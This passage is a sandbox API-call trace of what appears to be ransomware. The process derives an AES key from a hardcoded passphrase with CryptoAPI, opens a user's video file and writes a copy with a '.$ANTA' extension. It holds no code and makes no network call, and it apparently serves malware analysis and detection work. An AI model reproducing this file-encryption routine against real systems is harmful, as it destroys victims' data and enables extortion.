[0108.813] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0108.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0108.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1797028, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0108.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0108.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796f48, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0108.813] CryptAcquireContextA (in: phProv=0x144e300, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e300*=0x41a5250) returned 1 [0108.815] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0108.815] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0108.815] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0108.815] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0108.815] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0108.815] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0108.815] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0108.815] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0108.815] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0108.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0108.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cabb0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0108.815] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e070 | out: phHash=0x144e070) returned 1 [0108.816] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0108.816] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e27e8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0108.816] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0108.816] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0108.816] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2728, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0108.816] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0108.816] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0108.816] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0108.816] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cab68, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0108.816] CryptHashData (hHash=0x41ac000, pbData=0x17e2ae8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0108.816] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0108.816] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0108.816] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0108.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0108.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cad78, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0108.817] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac000, dwFlags=0x1, phKey=0x144e070 | out: phKey=0x144e070*=0x41ac040) returned 1 [0108.817] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0108.817] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0108.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0108.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796e88, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0108.817] CryptDestroyHash (hHash=0x41ac000) returned 1 [0108.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0108.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea0b8 [0108.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0108.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0108.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0108.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0108.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0108.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0108.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0108.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0108.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0108.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0108.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0108.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0108.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2aa0 [0108.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0108.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0108.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0108.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0108.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0108.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eada8 [0108.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0108.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0108.818] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0108.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0108.818] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0108.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac780 | out: hHeap=0x1780000) returned 1 [0108.819] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0108.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0108.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0108.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0108.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0108.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0108.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0108.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0108.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0108.819] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0108.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0108.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43ed3b0 [0108.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0108.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0108.819] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\tr4gQM\\recAT1.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\tr4gqm\\recat1.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0108.819] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0108.820] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e7a8 | out: lpNewFilePointer=0x0) returned 1 [0108.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0108.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0108.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0108.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0108.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0108.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0108.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0108.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0108.820] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0108.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0108.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0108.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0108.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0108.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0108.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0108.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0108.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0108.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0108.820] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0108.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac780 | out: hHeap=0x1780000) returned 1 [0108.821] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0108.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0108.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0108.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0108.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0108.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0108.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0108.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0108.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0108.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0108.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0108.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0108.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0108.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0108.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0108.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0108.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0108.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0108.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0108.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0108.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0108.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0108.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0108.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0108.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0108.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0108.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0108.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c08 [0108.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0108.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a7ba8 [0108.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0108.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5360 [0108.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0108.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a4508 [0108.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a7ba8 | out: hHeap=0x1780000) returned 1 [0108.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0108.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0108.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0108.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c08 | out: hHeap=0x1780000) returned 1 [0108.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0108.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5360 | out: hHeap=0x1780000) returned 1 [0108.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0108.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0108.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0108.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0108.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5360 [0108.823] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\tr4gQM\\" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\tr4gqm")) returned 0x10 [0108.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5360 | out: hHeap=0x1780000) returned 1 [0108.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0108.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a4508 | out: hHeap=0x1780000) returned 1 [0108.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0108.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0108.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0108.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0108.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0108.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0108.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0108.823] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\tr4gQM\\recAT1.mkv.$ANTA" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\tr4gqm\\recat1.mkv.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0109.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0109.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0109.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0109.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0109.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0109.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0109.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0109.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0109.163] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 1 [0109.163] TranslateMessage (lpMsg=0x144ebd4) returned 0 [0109.163] DispatchMessageW (lpMsg=0x144ebd4) returned 0x0 [0109.163] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0109.163] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0109.163] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0109.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0109.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0109.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0109.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0109.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0109.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0109.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0109.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0109.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0109.164] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0109.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac780 | out: hHeap=0x1780000) returned 1 [0109.164] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0109.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0109.164] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0109.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0109.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0109.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0109.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0109.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0109.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0109.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0109.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0109.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0109.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0109.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0109.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0109.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0109.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0109.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0109.165] RtlAllocateHeap 